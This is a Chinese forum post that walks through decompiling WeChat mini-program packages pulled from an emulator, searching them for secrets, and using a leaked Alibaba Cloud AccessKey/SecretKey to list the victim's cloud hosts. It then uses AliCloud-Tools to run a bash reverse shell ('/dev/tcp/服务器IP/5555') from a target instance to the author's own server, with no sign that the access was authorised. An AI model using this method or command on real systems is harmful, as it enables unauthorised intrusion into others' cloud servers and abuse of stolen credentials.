【干货分享】五分钟教你挖掘小程序漏洞

前言
现在大多小程序反编译教程所使用的都是node.js，操作过程较为麻烦，那有没有简单好用的工具呢？有！

准备工作
一个模拟器，这里用的是夜神模拟器（模拟器开启root权限）。登录微信，打开小程序首页
（图1）

然后再打开文件管理器，找到路径：
/ 根目录下的
data/data/com.tencent.mm/MicroMsg
在此目录下会有一个md5加密的文件夹。（如果打开微信小程序过多，同时有多个文件夹不容易识别的情况，可以选择把MicroMsg文件夹所有内容删除掉，再去重新打开微信小程序，就会得到唯一一个MD5加密命名的文件夹）（图2）

在该文件夹下的appbrand/pkg目录下找到.wxapkg后缀结尾的文件，其中只有几MB大小的为刚刚打开的小程序的文件。（该文件夹中文件过多也可以清空后，再打开小程序方便识别）（图3）

通过模拟器的共享文件将其传到物理机上。然后打开我们的工具（wxapkg-convertor）（图4）

将小程序的wxapkg文件直接拖入这个图标中，稍等片刻就可以看到目录下多了一个文件夹，此文件夹就是反编译好的小程序。使用VScode打开（图5）

正则查找API（图6）

挖洞实战
反编译成功后，查找api接口和敏感信息，定眼一看，在配置文件中，发现了AK/SK（图7）

先使用行云管家在线工具，输入AK/SK检索区域的主机个数，大概有6台主机（因之前没有截图，只能靠回忆），可以连接成功的只有4台主机，一台公网服务器，三台内网.
（图8）
最后利用AliCloud-Tools工具反弹shell，阿里云服务器上监听5555端口，同时要确保安全组中的配置规则开放5555端口。
执行反弹shell，将目标主机的shell反弹到自己的服务器上：
./AliCloud-Tools -a AK -s SK ecs exec -I 实例ID -c "bash -i >& /dev/tcp/服务器IP/5555 0>&1"
阿里云服务器接收到反弹shell会话
（图9）
项目地址
wxapkg-convertor：

游客，如果您要查看本帖隐藏内容请回复

alicloud-tools：

游客，如果您要查看本帖隐藏内容请回复